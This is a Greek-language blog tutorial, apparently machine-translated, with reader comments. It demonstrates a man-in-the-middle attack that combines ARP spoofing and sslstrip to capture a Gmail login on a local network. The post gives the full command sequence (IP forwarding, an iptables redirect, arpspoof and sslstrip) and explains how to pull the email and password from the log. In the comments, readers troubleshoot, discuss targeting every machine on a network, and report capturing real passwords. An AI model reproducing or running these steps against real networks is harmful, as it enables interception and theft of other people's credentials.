Γεια σας Bloggers.
Προς το παρόν έχω ένα μικρό δείγμα για το πόσο επικίνδυνο μπορεί να είναι η σύνδεση σε οποιοδήποτε δίκτυο χωρίς ασφάλεια αυτών που τόσοι πολλοί από εμάς αρέσουν.
Για σήμερα, πρόκειται να χρησιμοποιήσω το ArpSpoofing με το Sslstrip για να λάβω έναν κωδικό πρόσβασης Gmail. Για να κάνω το περιβάλλον πιο ελεγχόμενο, έχω δημιουργήσει έναν λογαριασμό που ονομάζεται "testarp@gmail.com".
Και επειδή δεν μου αρέσουν τα προοίμια, ας ξεκινήσουμε τις δουλειές μας.
ΠΕΡΙΒΑΛΛΟΝ
Για αυτό το τεστ αυτό που έχουμε είναι το εξής:
1. Επιτιθέμενος: Ο επιτραπέζιος ή επιτραπέζιος υπολογιστής μου έχει το Debian Wheezy. Από τα αποθετήρια μπορείτε να εγκαταστήσετε sslstrip y dsniff να πάρει άρπας
2. Θύμα: Το θύμα είναι ένα Tablet Android που θέλει να δει μόνο τα μηνύματά του μέσω του προγράμματος περιήγησης.
3. Το μέσο: Η μέση είναι δική μου Δρομολογητής Cisco DPC2425
ΔΙΕΥΘΥΝΣΕΙΣ.
Διεύθυνση εισβολέα: 172.26.0.2
Διεύθυνση δρομολογητή: 172.26.0.1
Διεύθυνση θύματος: 172.26.0.8
Η ΕΠΙΘΕΣΗ:
Το πρώτο πράγμα που θα κάνουμε για αυτήν την επίθεση είναι να ενεργοποιήσουμε το προς τα εμπρός έτσι ώστε ο υπολογιστής μας να μπορεί να προωθήσει τις πληροφορίες στο θύμα χωρίς να το παρατηρήσει. (Διαφορετικά θα ήταν επίθεση άρνησης παροχής υπηρεσιών)
Για αυτό θα χρησιμοποιήσουμε:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Τώρα αν κάνουμε ουρά -φ desdelinux βλέπουμε τις πληροφορίες ζωντανά και άμεσα
Λοιπόν, πώς παίρνουμε αυτό που θέλουμε;
Ας εισάγουμε πρώτα την αλληλογραφία μας στο Tablet. Κατά τη σύνδεση, βλέπουμε ότι χιλιάδες και χιλιάδες πράγματα εμφανίζονται στην κονσόλα μας.
Τώρα που τελείωσε ας ανοίξουμε το αρχείο μας "desdelinux” με νανο
nano desdelinux
με το Control + W αναζητάμε κάτι που ονομάζεται SECURE POST.
Και θα δούμε κάτι τέτοιο.
Μεταξύ αυτής της τεράστιας γραμμής που δεν μπορεί να δει είναι το email και ο κωδικός πρόσβασης του θύματος.
Τρέχουμε λοιπόν προς τα δεξιά μέχρι να δούμε επιτέλους το φως στο τέλος της σήραγγας.
Σε άλλη περίπτωση θα δούμε πώς μπορούμε να προστατευτούμε λίγο από αυτές τις επιθέσεις.
αφορά
Παίρνω αυτήν την ευκαιρία να πω ότι όταν δημοσιεύτηκε η ανάρτηση, οι εντολές δεν ήταν σωστές.
Στην εντολή iptables λείπει το 8080 που βρίσκεται σε άλλη γραμμή. Και τότε οι εντολές arpspoof ήταν όλες στην ίδια γραμμή. Κάθε εντολή βρίσκεται σε διαφορετική γραμμή.
Ας ελπίσουμε ότι ο συντάκτης το βλέπει και μπορεί να το διορθώσει.
Χαιρετισμούς.
Έχω κάνει τις διορθώσεις που αναφέρατε, είναι εντάξει;
Εάν πρόκειται να εισαγάγετε κωδικό σε μια προτιμώμενη καταχώριση, χρησιμοποιήστε την προβολή HTML και βεβαιωθείτε ότι το άρθρο είναι σωστό πριν το στείλετε σε εκκρεμότητα. Ευχαριστώ.
Είναι συγκλονιστικό να γνωρίζουμε ότι όσοι από εμάς δεν έχουμε γνώση είναι τόσο ευάλωτοι. Πολύ καλές πληροφορίες ακόμη και όταν καταλαβαίνω λίγα από το θέμα συνειδητοποιώ τη σημασία. Ευχαριστώ!
αφορά
Αλλά αυτό λειτουργεί μόνο εάν ο εισβολέας και το θύμα βρίσκονται στο ίδιο δίκτυο. Σε κάθε περίπτωση, μου φαίνεται ότι εάν (βρίσκεστε στο ίδιο δίκτυο) συνδεθείτε χρησιμοποιώντας HTTPS που δεν συμβαίνει επειδή τα δεδομένα κρυπτογραφούνται ΠΡΙΝ βγείτε από το μηχάνημά σας. Εάν συνδεθείτε μέσω HTTP (χωρίς S) νομίζω ότι ακόμη και κοιτάζοντας το καλώδιο δικτύου βλέπετε τα πλήκτρα.
Δεν είναι αλήθεια. Παραβιάζω έναν κωδικό πρόσβασης gmail και αν παρατηρήσετε ότι το Gmail χρησιμοποιεί https. Ετσι? Το θέμα είναι ότι αν και το https είναι ασφαλές, εξαρτάται από το http. Άρα δεν είναι τόσο ασφαλές.
Μην ομολογείτε τόσο πολύ για ένα https που το S δεν είναι για τον Superman, αλλά για "ασφαλές"
λειτουργεί με ή χωρίς https, το δοκίμασα με μια πιο εξειδικευμένη διανομή linux και λειτουργεί χωρίς προβλήματα
Μπορείτε να το χρησιμοποιήσετε με ακρίβεια για να μάθετε σε όσους κλέβουν το Wi-Fi σας ένα μάθημα. 😀
Είναι λίγο πολύ σαν αυτό που είπαν εδώ και πολύ καιρό στο blog της Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, υπέροχο τι κάνει! / Και μετά λένε το παρανοϊκό μου κάθε φορά που χρησιμοποιώ το VPN όταν πηγαίνουν για να ελέγξουν τον τραπεζικό λογαριασμό…). Παρεμπιπτόντως, πρέπει να δεις πόσο κυνικοί άνθρωποι στα σχόλια ... αν στο τέλος κλέβει ...
Τώρα πρέπει να πάρουμε ένα σεμινάριο για το πώς να δημιουργήσουμε και να προσφέρουμε τη δική σας υπηρεσία VPN.
Η ιστορία που συνδέετε είναι πολύ ενδιαφέρουσα, φαίνεται μάλιστα άξια ενός νέου βιβλίου και αυτό με κάνει να θυμάμαι όταν χρησιμοποίησα το Διαδίκτυο των γειτόνων μου και παρόλο που λέω ότι γνωρίζω το θέμα, νομίζω ότι δεν θα μπορούσα ποτέ να δω τις πραγματικές διαστάσεις του κινδύνου που θα μπορούσα να είχα τελευταίο, ευτυχώς για μένα, άλλαξαν μόνο τον κωδικό πρόσβασης σε WPA2 και από εκεί ξεκίνησε η ιστορία μου με τον ISP
Γι 'αυτό ο τίτλος λέει Sslstrip σε δράση.
Λειτουργεί, αρκεί ο εισβολέας να είναι στη μέση
Τι κύμα εργάζεστε στο πρίσμα; --.-
όχι.
Τι περιμένετε να στείλετε το αίτημά σας XD
αφορά
καλή θέση
Ενδιαφέρον, θα κάνω ένα εκπαιδευτικό τεστ αργότερα ... Ίσως θα μπορούσα να καταργήσω τον κωδικό πρόσβασης στο WiFi και να διασκεδάσω λίγο for
Κατά τύχη, μπορείτε να κάνετε κάτι παρόμοιο για να στείλετε διαφορετικές σελίδες σε αυτές που ζητήθηκαν από τον στόχο; Για παράδειγμα, θέλουν να ανοίξουν το Facebook και να τα ανακατευθύνω στο Google; 😛
Ναί. Αλλά όλα είναι πολύ διαφορετικά.
Ίσως θα το δημοσιεύσω αργότερα.
πολύ καλή δημοσίευση, αυτά τα θέματα είναι πολύ εκπαιδευτικά, τώρα πρέπει να είμαστε σε θέση να αντιμετωπίσουμε αυτήν την επίθεση, καθώς ορισμένοι (όπως εγώ) συνδέονται με δημόσια δίκτυα (για παράδειγμα το πανεπιστήμιο) θα ήταν χρήσιμο να το αποφύγουμε.
Χαιρετισμούς!
Δεν λειτούργησε για μένα 🙁
Κάτι με αποτυγχάνει εδώ, εκτός από το γεγονός ότι οι συνδέσεις https κρυπτογραφούνται μέσω πιστοποιητικού διακομιστή (μόλις έχετε το πιστοποιητικό στο μηχάνημά σας, το πρόγραμμα περιήγησής σας είναι υπεύθυνο για την κρυπτογράφηση) με iptables ανακατευθύνετε τη θύρα 80 (http) , όχι το 443 που είναι https
Το σκέφτηκα και εγώ. Το θέμα είναι ότι αν και το https είναι "ασφαλές", δυστυχώς εξαρτάται από το http. Έτσι το sslstrip το εκμεταλλεύεται, κάνει το πρόγραμμα περιήγησης να πιστεύει ότι χρησιμοποιεί διαπιστευτήρια https αλλά δεν είναι.
Γαμώτο! αλλά το πρόγραμμα περιήγησης θα πρέπει να βλέπει μια προειδοποίηση όπως "αυτό το πιστοποιητικό προέρχεται από έναν ύποπτο ιστότοπο ή κάτι τέτοιο" ... σίγουρα θα πρέπει να κάνω δοκιμές XD
Όχι, απολύτως τίποτα δεν βγαίνει.
Δούλεψε τελικά για μένα
Είμαι συνδεδεμένος σε δίκτυο WEP με κωδικό πρόσβασης και μου έδειξε τον κωδικό πρόσβασης.
Μια ερώτηση. Μπορείτε να κάνετε την ίδια διαδικασία, αλλά για όλους τους υπολογιστές που είναι συνδεδεμένοι στο δίκτυο, αντί να έχετε ένα μόνο θύμα;
Ναι μπορείς. Αλλά δεν έχω κάνει πειράματα. Δοκιμάστε το μόνοι σας και πείτε μας πώς πηγαίνει.
Το μόνο πράγμα που έχω με αυτό είναι ότι το μηχάνημα του θύματος είναι εκτός σύνδεσης, αλλά το sslstrip δεν μου δείχνει τίποτα: /
Πρέπει να απενεργοποιήσετε το τείχος προστασίας για μια στιγμή. Ή τουλάχιστον ενεργοποιήστε τις εισερχόμενες συνδέσεις.
Ο Probe και εγώ μπορούσαμε να δούμε μόνο το όνομα χρήστη και τον κωδικό πρόσβασης της σελίδας facebook, στο gmail δεν βρήκα κανένα αποτέλεσμα στο αρχείο καταγραφής, επίσης χρειαζόμουν μόνο μια γραμμή arpspoof «arpspoof -i -t». Από την άλλη πλευρά, η μηχανή του θύματος δεν μπόρεσε να ανοίξει μερικές σελίδες. Θα συνεχίσω τη διερεύνηση, είναι πολύ ενδιαφέρον. Μια βοήθεια για όσους χρησιμοποιούν το Manjaro, τα πακέτα για εγκατάσταση είναι: dsniff (εδώ είναι το arpspoff), στριμμένα και python2-pyopenssl. Μπορείτε να κατεβάσετε το Sslstrip από εδώ: http://www.thoughtcrime.org/software/sslstrip/
Για να το εκτελέσετε $ python2 sslstrip.py
Χαιρετισμούς.
Δεν βγήκε αλλά η γραμμή arpspoof είναι: #arpspoof -i int -t ip-korban ip-router
κοίτα κάνω ακριβώς αυτό που λέτε:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
το πρόβλημα είναι ότι το θύμα που είναι άλλος υπολογιστής που έχω εδώ στο δωμάτιό μου, δεν έχω καμία σχέση με το σημείο που πρέπει να επανεκκινήσω τον δρομολογητή, τι μπορώ να με βοηθήσω.
Ένα άλλο πράγμα που δουλεύω με μια εικονική μηχανή και όταν εκτελώ την εντολή iwconfig, το wlan0 δεν εμφανίζεται, ούτε όταν εκτελώ το ifconfig, ωστόσο αν έχω internet στο εικονικό μου μηχάνημα, τι με μια διεπαφή eth0.